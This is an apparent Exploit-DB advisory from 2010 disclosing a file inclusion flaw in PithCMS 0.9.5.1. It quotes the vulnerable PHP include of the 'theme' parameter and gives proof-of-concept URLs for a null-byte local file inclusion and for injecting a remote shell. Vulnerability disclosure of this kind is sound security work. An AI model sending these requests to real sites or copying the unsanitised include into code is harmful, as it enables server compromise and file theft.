Pithcms - 'theme' Local/Remote File Inclusion

EDB-ID:

14271

CVE:

N/A




Platform:

PHP

Date:

2010-07-08


Title:		pithcms (theme) Local / remote File inclusion VUlnerability
Version:	0.9.5.1
download:	http://sourceforge.net/projects/pithcms/files/
Author:		eidelweiss
Contact:	g1xsystem[at]windowslive.com

=====================================================================

	-=[ CODE ]=-

include ("templates/".$theme."/index.php"); 

	-=[ P0C ]=-

	http://127.0.0.1/path/index.php?theme= [LFI]%00

	htp://127.0.0.1/path/index.php?theme= [inj3ct0r sh3ll]

=========================| -=[ E0F ]=- |=========================